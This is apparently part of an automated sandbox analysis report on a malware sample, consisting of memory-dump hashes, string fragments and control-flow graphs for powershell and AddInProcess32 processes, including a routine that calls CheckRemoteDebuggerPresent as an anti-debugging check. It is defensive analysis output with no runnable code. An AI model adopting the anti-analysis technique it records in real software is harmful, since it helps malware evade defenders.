                    • Instruction ID: 33d363daf54a2d6e426677b962932624f5a1439caf84f2444832fccf9f06ee4a
                    • Opcode Fuzzy Hash: 59542a2c3eb933a36c8b584b9b4e75dd8fa431360fbffc737f4e06b4e8087249
                    • Instruction Fuzzy Hash: F7014C6240D3D09FE7168B25EC94762BFB4DF53624F1985DBE8888F1A3C2689C45CB72
                    Memory Dump Source
                    • Source File: 00000006.00000002.473183199.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_12d000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c95a9eef77e8e758a902a301842d30b3a6131b6c236df63c83b67531460014f
                    • Instruction ID: 51ef8c203dc16e27587b266ee95018b9244438aab33415c327ff6328a9603b14
                    • Opcode Fuzzy Hash: 1c95a9eef77e8e758a902a301842d30b3a6131b6c236df63c83b67531460014f
                    • Instruction Fuzzy Hash: 9701F731504350AEF7188A15FCC4B67BB98DF81724F18C556FC484B192C379DD51CAB5
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 551467476b08143fd5b50ee23ad8eacb5a9fd9e3b78c47a90091fde2d4154e1a
                    • Instruction ID: b9e43e227f760ff1471399b4aa25e64a81a8a03c443a7b084cb09a3199314783
                    • Opcode Fuzzy Hash: 551467476b08143fd5b50ee23ad8eacb5a9fd9e3b78c47a90091fde2d4154e1a
                    • Instruction Fuzzy Hash: CAE0D8717052458FDF25767190353FD7F61BFE2250F614096CC50B7245EE308916C712
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`8M$`8M$`8M$9M
                    • API String ID: 0-4179329184
                    • Opcode ID: 5e52dd4c47cd7cc41e21afbdf87cc0247ebb4df5dfcacb1562b13f6c36e7594a
                    • Instruction ID: 07a354b267dcf400f3274f5546f90b51067ac7a55e4313b8984ce5f4a85e7aca
                    • Opcode Fuzzy Hash: 5e52dd4c47cd7cc41e21afbdf87cc0247ebb4df5dfcacb1562b13f6c36e7594a
                    • Instruction Fuzzy Hash: 0DE11531B00204DFEF55AE64D814B7E7BA2BFC5320F24846AE905AB2D1CB75DD89CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: <$L4#p$L4#p$L4#p$`8M$`8M
                    • API String ID: 0-855835139
                    • Opcode ID: 0ed83de3c900c9959a072fa5c91f0f63eeb022c15bf2d2f7907f63e90461ae38
                    • Instruction ID: 940bd02b1b4a2a116fa18971594ac596f29e129349e308cfb0f4e1ea224402e8
                    • Opcode Fuzzy Hash: 0ed83de3c900c9959a072fa5c91f0f63eeb022c15bf2d2f7907f63e90461ae38
                    • Instruction Fuzzy Hash: 9951A5306093849FDB529B2088287A97FB1BF42310F5991DBD881AF1E3C7789D49CB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: L4#p$L4#p$L4#p$`8M$`8M
                    • API String ID: 0-15005550
                    • Opcode ID: 5c117c7348c81621e6abd02a407025d8615570427425f26877b82fdac3977fcb
                    • Instruction ID: 65c48d3ece8bb74ed59d2abb5c721bc8bc833ac5b27455f4cc3ee7cfb41c7f17
                    • Opcode Fuzzy Hash: 5c117c7348c81621e6abd02a407025d8615570427425f26877b82fdac3977fcb
                    • Instruction Fuzzy Hash: A341AF34A04248DFDF55AF14C818BBA7FA2BB41310F599166EC41AB2D2C7B4DD89CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.473518150.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_580000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (Fc$L4#p$L4#p$L4#p
                    • API String ID: 0-3343562816
                    • Opcode ID: 259cb4a6667f908f735b491324a1ab0021ced78708f3203e3b0fe7dee45f8289
                    • Instruction ID: b34683539884f56abb1bb10fb46603bf533c12ce8b34112947dcba5feba2eddc
                    • Opcode Fuzzy Hash: 259cb4a6667f908f735b491324a1ab0021ced78708f3203e3b0fe7dee45f8289
                    • Instruction Fuzzy Hash: 4C612531700244AFDF55AE64D810BBE7BA2BFC0310F14846AE905AB2D2DB75ED55CBA2

                    Execution Graph

                    Execution Coverage:9.5%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:100%
                    Total number of Nodes:3
                    Total number of Limit Nodes:0
                    execution_graph 11489 245318 11490 24535c CheckRemoteDebuggerPresent 11489->11490 11491 24539e 11490->11491
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: Rs%$Rs%
                    • API String ID: 0-2731525182
                    • Opcode ID: 73985d0562bc3e2fc5b72a058ceb4112f349ba7b1dea1a401b1e0ac3501d2215
                    • Instruction ID: 416dc9409722ce9b22bd54ba63281a4c2fde4291ff64d7cc7d307588958b8627
                    • Opcode Fuzzy Hash: 73985d0562bc3e2fc5b72a058ceb4112f349ba7b1dea1a401b1e0ac3501d2215
                    • Instruction Fuzzy Hash: C0334E30D1071A8EDB15EF68C8846ADF7B1FF99300F15C69AE459B7211EB70AAD4CB81

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 439 24f4e8-24f509 440 24f50b-24f50e 439->440 441 24f514-24f533 440->441 442 24fcaf-24fcb2 440->442 452 24f535-24f538 441->452 453 24f54c-24f556 441->453 443 24fcb4-24fcd3 442->443 444 24fcd8-24fcda 442->444 443->444 446 24fce1-24fce4 444->446 447 24fcdc 444->447 446->440 449 24fcea-24fcf3 446->449 447->446 452->453 454 24f53a-24f54a 452->454 457 24f55c-24f56d call 246954 453->457 454->457 459 24f572-24f577 457->459 460 24f584-24f861 459->460 461 24f579-24f57f 459->461 482 24f867-24f916 460->482 483 24fca1-24fcae 460->483 461->449 492 24f93f 482->492 493 24f918-24f93d 482->493 495 24f948-24f95b call 246960 492->495 493->495 498 24f961-24f983 call 24696c 495->498 499 24fc88-24fc94 495->499 498->499 503 24f989-24f993 498->503 499->482 501 24fc9a 499->501 501->483 503->499 504 24f999-24f9a4 503->504 504->499 505 24f9aa-24fa80 call 240174 * 2 504->505 519 24fa82-24fa84 505->519 520 24fa8e-24fabe call 240174 505->520 519->520 525 24fac0-24fac2 520->525 526 24facc-24fad8 520->526 525->526 527 24fb38-24fb3c 526->527 528 24fada-24fade 526->528 529 24fb42-24fb7e call 240174 527->529 530 24fc79-24fc82 527->530 528->527 531 24fae0-24fb0a call 240174 528->531 545 24fb80-24fb82 529->545 546 24fb8c-24fb9a 529->546 530->499 530->505 540 24fb0c-24fb0e 531->540 541 24fb18-24fb35 call 246978 531->541 540->541 541->527 545->546 548 24fbb1-24fbbc 546->548 549 24fb9c-24fba7 546->549 553 24fbd4-24fbe5 548->553 554 24fbbe-24fbc4 548->554 549->548 552 24fba9 549->552 552->548 558 24fbe7-24fbed 553->558 559 24fbfd-24fc09 553->559 555 24fbc6 554->555 556 24fbc8-24fbca 554->556 555->553 556->553 560 24fbf1-24fbf3 558->560 561 24fbef 558->561 563 24fc21-24fc72 559->563 564 24fc0b-24fc11 559->564 560->559 561->559 563->530 565 24fc15-24fc17 564->565 566 24fc13 564->566 565->563 566->563
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: (#E$#E
                    • API String ID: 0-3101420961
                    • Opcode ID: c31f0e4856c53aa8bbf31fedd678f0ae38b4a8216b4192af3224a7ef4e2a98c4
                    • Instruction ID: f552b099ec7788b6a264d4e058d6d61ca2c424f4a3910bdc03be77ccd9f8727e
                    • Opcode Fuzzy Hash: c31f0e4856c53aa8bbf31fedd678f0ae38b4a8216b4192af3224a7ef4e2a98c4
                    • Instruction Fuzzy Hash: FC322F31E107198FDB14EF75C8946ADB7B5BFC9300F60C66AE449AB254EB70A985CF80

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 869 245318-24539c CheckRemoteDebuggerPresent 871 2453a5-2453e0 869->871 872 24539e-2453a4 869->872 872->871
                    APIs
                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0024538F
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID: CheckDebuggerPresentRemote
                    • String ID:
                    • API String ID: 3662101638-0
                    • Opcode ID: 98f61ee533c72ab8195626aa325c0bef1652e19afa43d1e689c67eb37885be74
                    • Instruction ID: 33dc22b38b1bece55aa144165c1c8ad140b4086094ee2211853ab9a5072811a8
                    • Opcode Fuzzy Hash: 98f61ee533c72ab8195626aa325c0bef1652e19afa43d1e689c67eb37885be74
                    • Instruction Fuzzy Hash: 922139B1C002598FDB04CF9AD8847EEFBF4AF49310F14845AD859B7250D778AA44CF65

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1432 244910-244976 1434 2449c0-2449c2 1432->1434 1435 244978-244983 1432->1435 1436 2449c4-2449dd 1434->1436 1435->1434 1437 244985-244991 1435->1437 1443 2449df-2449eb 1436->1443 1444 244a29-244a2b 1436->1444 1438 2449b4-2449be 1437->1438 1439 244993-24499d 1437->1439 1438->1436 1441 2449a1-2449b0 1439->1441 1442 24499f 1439->1442 1441->1441 1445 2449b2 1441->1445 1442->1441 1443->1444 1446 2449ed-2449f9 1443->1446 1447 244a2d-244a45 1444->1447 1445->1438 1448 244a1c-244a27 1446->1448 1449 2449fb-244a05 1446->1449 1454 244a47-244a52 1447->1454 1455 244a8f-244a91 1447->1455 1448->1447 1450 244a07 1449->1450 1451 244a09-244a18 1449->1451 1450->1451 1451->1451 1453 244a1a 1451->1453 1453->1448 1454->1455 1457 244a54-244a60 1454->1457 1456 244a93-244aab 1455->1456 1464 244af5-244af7 1456->1464 1465 244aad-244ab8 1456->1465 1458 244a62-244a6c 1457->1458 1459 244a83-244a8d 1457->1459 1460 244a70-244a7f 1458->1460 1461 244a6e 1458->1461 1459->1456 1460->1460 1463 244a81 1460->1463 1461->1460 1463->1459 1466 244af9-244b6c 1464->1466 1465->1464 1467 244aba-244ac6 1465->1467 1476 244b72-244b80 1466->1476 1468 244ac8-244ad2 1467->1468 1469 244ae9-244af3 1467->1469 1471 244ad4 1468->1471 1472 244ad6-244ae5 1468->1472 1469->1466 1471->1472 1472->1472 1473 244ae7 1472->1473 1473->1469 1477 244b82-244b88 1476->1477 1478 244b89-244be9 1476->1478 1477->1478 1485 244bf9-244bfd 1478->1485 1486 244beb-244bef 1478->1486 1488 244c0d-244c11 1485->1488 1489 244bff-244c03 1485->1489 1486->1485 1487 244bf1 1486->1487 1487->1485 1491 244c21-244c25 1488->1491 1492 244c13-244c17 1488->1492 1489->1488 1490 244c05 1489->1490 1490->1488 1494 244c35-244c39 1491->1494 1495 244c27-244c2b 1491->1495 1492->1491 1493 244c19 1492->1493 1493->1491 1497 244c49-244c4d 1494->1497 1498 244c3b-244c3f 1494->1498 1495->1494 1496 244c2d 1495->1496 1496->1494 1500 244c5d 1497->1500 1501 244c4f-244c53 1497->1501 1498->1497 1499 244c41-244c44 call 240ab8 1498->1499 1499->1497 1504 244c5e 1500->1504 1501->1500 1503 244c55-244c58 call 240ab8 1501->1503 1503->1500 1504->1504
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 21bc4df0c4b117a38387bcecb49b36affadf8a2267c9262861091a40f4d5fe08
                    • Instruction ID: f145ea407e779235416b0e0200ff5808cecefd43f389f29fdc8a11c21274c886
                    • Opcode Fuzzy Hash: 21bc4df0c4b117a38387bcecb49b36affadf8a2267c9262861091a40f4d5fe08
                    • Instruction Fuzzy Hash: 62B1B070E10219CFDF18DFA8D89579EBBF2BF88314F248129D814E7294EB749851CB85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1668 2438f0-243956 1670 2439a0-2439a2 1668->1670 1671 243958-243963 1668->1671 1673 2439a4-2439fc 1670->1673 1671->1670 1672 243965-243971 1671->1672 1674 243994-24399e 1672->1674 1675 243973-24397d 1672->1675 1682 243a46-243a48 1673->1682 1683 2439fe-243a09 1673->1683 1674->1673 1676 243981-243990 1675->1676 1677 24397f 1675->1677 1676->1676 1679 243992 1676->1679 1677->1676 1679->1674 1685 243a4a-243a62 1682->1685 1683->1682 1684 243a0b-243a17 1683->1684 1686 243a19-243a23 1684->1686 1687 243a3a-243a44 1684->1687 1692 243a64-243a6f 1685->1692 1693 243aac-243aae 1685->1693 1688 243a25 1686->1688 1689 243a27-243a36 1686->1689 1687->1685 1688->1689 1689->1689 1691 243a38 1689->1691 1691->1687 1692->1693 1695 243a71-243a7d 1692->1695 1694 243ab0-243afe 1693->1694 1703 243b04-243b12 1694->1703 1696 243aa0-243aaa 1695->1696 1697 243a7f-243a89 1695->1697 1696->1694 1698 243a8d-243a9c 1697->1698 1699 243a8b 1697->1699 1698->1698 1701 243a9e 1698->1701 1699->1698 1701->1696 1704 243b14-243b1a 1703->1704 1705 243b1b-243b7b 1703->1705 1704->1705 1712 243b7d-243b81 1705->1712 1713 243b8b-243b8f 1705->1713 1712->1713 1714 243b83 1712->1714 1715 243b91-243b95 1713->1715 1716 243b9f-243ba3 1713->1716 1714->1713 1715->1716 1719 243b97-243b9a call 240ab8 1715->1719 1717 243ba5-243ba9 1716->1717 1718 243bb3-243bb7 1716->1718 1717->1718 1720 243bab-243bae call 240ab8 1717->1720 1721 243bc7-243bcb 1718->1721 1722 243bb9-243bbd 1718->1722 1719->1716 1720->1718 1726 243bcd-243bd1 1721->1726 1727 243bdb-243bdf 1721->1727 1722->1721 1725 243bbf-243bc2 call 240ab8 1722->1725 1725->1721 1726->1727 1729 243bd3 1726->1729 1730 243be1-243be5 1727->1730 1731 243bef 1727->1731 1729->1727 1730->1731 1732 243be7 1730->1732 1733 243bf0 1731->1733 1732->1731 1733->1733
                    Memory Dump Source
                    • Source File: 00000008.00000002.619271174.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_240000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2747e7ab63b013e00d92c9a3c8d0625be8d0d0ff470e6e1770eaad9e37c55da
                    • Instruction ID: 2c067b56a809f380cfb21f3959eeb36eb51a054894d2921ab4a078d75b4cf060
                    • Opcode Fuzzy Hash: b2747e7ab63b013e00d92c9a3c8d0625be8d0d0ff470e6e1770eaad9e37c55da
                    • Instruction Fuzzy Hash: DB916E70E102199FDF18CFA9C9857DDBBF2EF88318F148129E805A7294DB749A95CF81

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 746 581258-581274 747 581276-581279 746->747 748 58127b-581297 747->748 749 58129c-58129e 747->749 748->749 750 5812a0 749->750 751 5812a5-5812a8 749->751 750->751 751->747 753 5812aa-5813c5 751->753 772 5813d1-5813e0 753->772 773 5813c7-5813cb 753->773 774 58183e-581848 772->774 775 5813e6-5813ef 772->775 773->772 776 581834-581839 775->776 777 5813f5-581400 775->777 776->774 778 58180e-58181a 777->778 779 581406-58141d 777->779 778->775 783 581820 778->783 779->778 784 581423-58142c 779->784 783->774 784->776 785 581432-581457 784->785 788 5817fc-581808 785->788 789 58145d-581474 785->789 788->778 788->784 789->788 791 58147a-581483 789->791 791->776 792 581489-5814a3 791->792 794 5814aa-5814ac 792->794 795 5814ae-5814be 794->795 796 5814f6-581509 794->796 801 58150e-581541 795->801 802 5814c0-5814d0 795->802 797 5817d8-5817dc 796->797 799 5817de 797->799 800 5817e7 797->800 799->800 800->788 810 581583-581593 801->810 811 581543-581581 801->811 802->801 805 5814d2-5814e2 802->805 805->801 809 5814e4-5814f4 805->809 809->796 809->801 815 5815ab-5815c0 810->815 816 581595-58159b 810->816 821 5815c2-581629 811->821 815->821 817 58159d 816->817 818 58159f-5815a1 816->818 817->815 818->815 830 5816db-5816fb 821->830 831 58162f-581632 821->831 840 5816fd-58173e 830->840 841 581753-58175f 830->841 832 581638-581648 831->832 833 5817b9-5817be 831->833 838 58164e-5816a3 832->838 839 5816d1-5816d5 832->839 842 5817c3-5817d6 833->842 838->833 865 5816a9-5816c3 838->865 839->830 839->831 840->833 863 581740-581751 840->863 847 581761-581767 841->847 848 581777-58178c 841->848 842->797 849 581769 847->849 850 58176b-58176d 847->850 855 58178e-5817b7 848->855 849->848 850->848 855->842 863->855 865->833 868 5816c9-5816cf 865->868 868->830
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: e63bce3140520b94ac9eeed6134e6c6b5bf5f55073a74abbabeefe1a52b19f2b
                    • Instruction ID: c58b0f38dfaf7ec77a2f17bd9788cc0a490665c283a36b4a1c6a7bacb3fb32b4
                    • Opcode Fuzzy Hash: e63bce3140520b94ac9eeed6134e6c6b5bf5f55073a74abbabeefe1a52b19f2b
                    • Instruction Fuzzy Hash: CAF11D34A006048FDB18EFA5D494B6E7BB6FF84300F248569E806AB359DB75EC42CF54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 875 582248-582267 876 582269-58226c 875->876 877 58226e-58228a 876->877 878 58228f-582292 876->878 877->878 879 582298-5822a4 878->879 880 58233f-582342 878->880 884 5822af-5822b1 879->884 882 582578-58257a 880->882 883 582348-582357 880->883 885 58257c 882->885 886 582581-582584 882->886 892 582359-582374 883->892 893 582376-5823ba 883->893 890 5822c9-5822cd 884->890 891 5822b3-5822b9 884->891 885->886 886->876 888 58258a-582593 886->888 896 5822db 890->896 897 5822cf-5822d9 890->897 894 5822bb 891->894 895 5822bd-5822bf 891->895 892->893 903 58254c-582561 893->903 904 5823c0-5823d1 893->904 894->890 895->890 898 5822e0-5822e2 896->898 897->898 899 5822f9-582332 898->899 900 5822e4-5822e7 898->900 899->883 918 582334-58233e 899->918 900->888 903->882 910 582537-582546 904->910 911 5823d7-5823f4 904->911 910->903 910->904 911->910 917 5823fa-5824f1 911->917 941 5824ff 917->941 942 5824f3-5824fd 917->942 943 582504-582506 941->943 942->943 943->910 944 582508-58250d 943->944 945 58251b 944->945 946 58250f-582519 944->946 947 582520-582522 945->947 946->947 947->910 948 582524-582530 947->948 948->910
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: D'E
                    • API String ID: 0-1419901812
                    • Opcode ID: ac7ec7d5bb371c6e51575dfee313748be50edabe91684c364bd86546de46db37
                    • Instruction ID: 397cd8ae3e1b65d8fd8500068cd4d26f2834cb6f92bc08d20c9079ff346cc30f
                    • Opcode Fuzzy Hash: ac7ec7d5bb371c6e51575dfee313748be50edabe91684c364bd86546de46db37
                    • Instruction Fuzzy Hash: E2916B31B002059FDB14EF65D4956AE7BA6FFC5304F208929E806EB394EB75ED428B90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 950 58124d-581274 951 581276-581279 950->951 952 58127b-581297 951->952 953 58129c-58129e 951->953 952->953 954 5812a0 953->954 955 5812a5-5812a8 953->955 954->955 955->951 957 5812aa-5813c5 955->957 976 5813d1-5813e0 957->976 977 5813c7-5813cb 957->977 978 58183e-581848 976->978 979 5813e6-5813ef 976->979 977->976 980 581834-581839 979->980 981 5813f5-581400 979->981 980->978 982 58180e-58181a 981->982 983 581406-58141d 981->983 982->979 987 581820 982->987 983->982 988 581423-58142c 983->988 987->978 988->980 989 581432-581457 988->989 992 5817fc-581808 989->992 993 58145d-581474 989->993 992->982 992->988 993->992 995 58147a-581483 993->995 995->980 996 581489-5814a3 995->996 998 5814aa-5814ac 996->998 999 5814ae-5814be 998->999 1000 5814f6-581509 998->1000 1005 58150e-581541 999->1005 1006 5814c0-5814d0 999->1006 1001 5817d8-5817dc 1000->1001 1003 5817de 1001->1003 1004 5817e7 1001->1004 1003->1004 1004->992 1014 581583-581593 1005->1014 1015 581543-581581 1005->1015 1006->1005 1009 5814d2-5814e2 1006->1009 1009->1005 1013 5814e4-5814f4 1009->1013 1013->1000 1013->1005 1019 5815ab-5815c0 1014->1019 1020 581595-58159b 1014->1020 1025 5815c2-581629 1015->1025 1019->1025 1021 58159d 1020->1021 1022 58159f-5815a1 1020->1022 1021->1019 1022->1019 1034 5816db-5816fb 1025->1034 1035 58162f-581632 1025->1035 1044 5816fd-58173e 1034->1044 1045 581753-58175f 1034->1045 1036 581638-581648 1035->1036 1037 5817b9-5817be 1035->1037 1042 58164e-5816a3 1036->1042 1043 5816d1-5816d5 1036->1043 1046 5817c3-5817d6 1037->1046 1042->1037 1069 5816a9-5816c3 1042->1069 1043->1034 1043->1035 1044->1037 1067 581740-581751 1044->1067 1051 581761-581767 1045->1051 1052 581777-58178c 1045->1052 1046->1001 1053 581769 1051->1053 1054 58176b-58176d 1051->1054 1059 58178e-5817b7 1052->1059 1053->1052 1054->1052 1059->1046 1067->1059 1069->1037 1072 5816c9-5816cf 1069->1072 1072->1034
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID: &55p
                    • API String ID: 0-1955183375
                    • Opcode ID: f90af1895d9a1219e3a1ed845b290efdb1e15e3b239c33c474b38230402b5650
                    • Instruction ID: ec441ae547af7bb6e1c35b8d3dae6e7af14eed125b5b7f0e1f3a77d77e24c2c4
                    • Opcode Fuzzy Hash: f90af1895d9a1219e3a1ed845b290efdb1e15e3b239c33c474b38230402b5650
                    • Instruction Fuzzy Hash: BA813270A116048FDB18EF65C494BAEB7BAFF84300F648529E806A7359CB75DC82CF54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1506 580ed0-580eec 1507 580eee-580ef1 1506->1507 1508 580ef3-580f0f 1507->1508 1509 580f14-580f17 1507->1509 1508->1509 1510 580f19-580f33 call 24e23d 1509->1510 1511 580f40-580f42 1509->1511 1526 580f38-580f3b 1510->1526 1513 580f49-580f4c 1511->1513 1514 580f44 1511->1514 1513->1507 1515 580f4e-580f5a 1513->1515 1514->1513 1517 581210-581213 1515->1517 1518 580f60-580f69 1515->1518 1523 58123a-581243 1517->1523 1520 580f6f-580f90 1518->1520 1521 581215-581233 1518->1521 1529 580f9a-580fd4 1520->1529 1530 580f92-580f95 1520->1530 1521->1523 1526->1511 1537 580fde-580fe4 1529->1537 1538 580fd6-580fd9 1529->1538 1530->1523 1539 580fea-581053 1537->1539 1540 5811fe-58120a 1537->1540 1538->1523 1539->1521 1549 581059-581063 1539->1549 1540->1517 1540->1518 1549->1521 1550 581069-58107f 1549->1550 1550->1521 1552 581085-5810a0 1550->1552 1555 5810af-5810b6 1552->1555 1556 5810a2-5810a7 1552->1556 1555->1521 1557 5810bc-5810c6 1555->1557 1556->1555 1558 5810c8-5810cd 1557->1558 1559 5810d5-5810dc 1557->1559 1558->1559 1559->1521 1560 5810e2-5810ec 1559->1560 1561 5810fb-581102 1560->1561 1562 5810ee-5810f3 1560->1562 1561->1521 1563 581108-581118 1561->1563 1562->1561 1564 58111a-58111f 1563->1564 1565 581127-58112e 1563->1565 1564->1565 1565->1521 1566 581134-58113e 1565->1566 1567 58114d-581154 1566->1567 1568 581140-581145 1566->1568 1567->1521 1569 58115a-581172 1567->1569 1568->1567 1571 581183 1569->1571 1572 581174-581181 1569->1572 1573 581188-58118a 1571->1573 1572->1573 1574 58118c-58118e 1573->1574 1575 5811f1-5811f8 1573->1575 1576 58119c 1574->1576 1577 581190-58119a 1574->1577 1575->1539 1575->1540 1578 5811a1-5811a3 1576->1578 1577->1578 1578->1575 1579 5811a5-5811ea 1578->1579 1579->1575
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fa031084743300db6485ae744e17158f50c24e6160bd3b0b2ff2548bc0e883a6
                    • Instruction ID: 098083aafba0a0be74c598ffb66d7b8b5357cb0bd3958862fe23029ece13e6ef
                    • Opcode Fuzzy Hash: fa031084743300db6485ae744e17158f50c24e6160bd3b0b2ff2548bc0e883a6
                    • Instruction Fuzzy Hash: 6AA16B34A006049FCB14EF64C598B6EBBF6FF84314F548869E80AAB351DB35ED46CB84

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1587 584e40-584e59 1588 584e5b-584e5e 1587->1588 1589 584e6b-584e6e 1588->1589 1590 584e60-584e64 1588->1590 1593 584e90-584e93 1589->1593 1594 584e70-584e83 call 584e40 1589->1594 1591 584e99-584ea2 1590->1591 1592 584e66 1590->1592 1596 584ea8-584eae 1591->1596 1597 584f7b-584f85 1591->1597 1592->1589 1593->1591 1595 584f86-584f89 1593->1595 1605 584e89-584e8b 1594->1605 1600 584f8b-584fa7 1595->1600 1601 584fac-584faf 1595->1601 1598 584fd8-58500d 1596->1598 1599 584eb4-584ed3 1596->1599 1612 58500f-585012 1598->1612 1617 584ed9-584f14 1599->1617 1618 584f6c-584f75 1599->1618 1600->1601 1603 584fbc-584fbe 1601->1603 1604 584fb1-584fbb 1601->1604 1609 584fc0 1603->1609 1610 584fc5-584fc8 1603->1610 1605->1593 1609->1610 1610->1588 1611 584fce-584fd7 1610->1611 1613 585014-585030 1612->1613 1614 585035-585038 1612->1614 1613->1614 1619 58503e-585064 1614->1619 1620 585194-585196 1614->1620 1635 584f1e-584f28 1617->1635 1636 584f16-584f19 1617->1636 1618->1596 1618->1597 1633 58506b-585099 1619->1633 1622 585198 1620->1622 1623 58519d-5851a0 1620->1623 1622->1623 1623->1612 1624 5851a6-5851af 1623->1624 1647 58509b-5850a5 1633->1647 1648 585110-585134 1633->1648 1635->1618 1640 584f2a-584f3e 1635->1640 1636->1611 1643 584f4c 1640->1643 1644 584f40-584f4a 1640->1644 1646 584f51-584f53 1643->1646 1644->1646 1650 584f5f-584f6a 1646->1650 1651 584f55-584f58 1646->1651 1655 5850bd-58510e 1647->1655 1656 5850a7-5850ad 1647->1656 1659 58513e 1648->1659 1660 585136 1648->1660 1650->1618 1650->1640 1651->1650 1655->1647 1655->1648 1657 5850af 1656->1657 1658 5850b1-5850b3 1656->1658 1657->1655 1658->1655 1659->1620 1660->1659
                    Memory Dump Source
                    • Source File: 00000008.00000002.619660848.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_580000_AddInProcess32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a2f18f04c33383d4ea8a79306bbc55c587d21927f5eddfc28cfe0745d04d5c86
                    • Instruction ID: 762f7bd1c9fb8974fe20040162c9f561258dca5b1c0b4ef422a758a98638dc8d
                    • Opcode Fuzzy Hash: a2f18f04c33383d4ea8a79306bbc55c587d21927f5eddfc28cfe0745d04d5c86
                    • Instruction Fuzzy Hash: 1A81C131B006159FDB14BB74D4943AEBBA6FBC4310F24486AED06EB385EB35DD428B91

                    Control-flow Graph

                    • Executed
                    • Not Executed
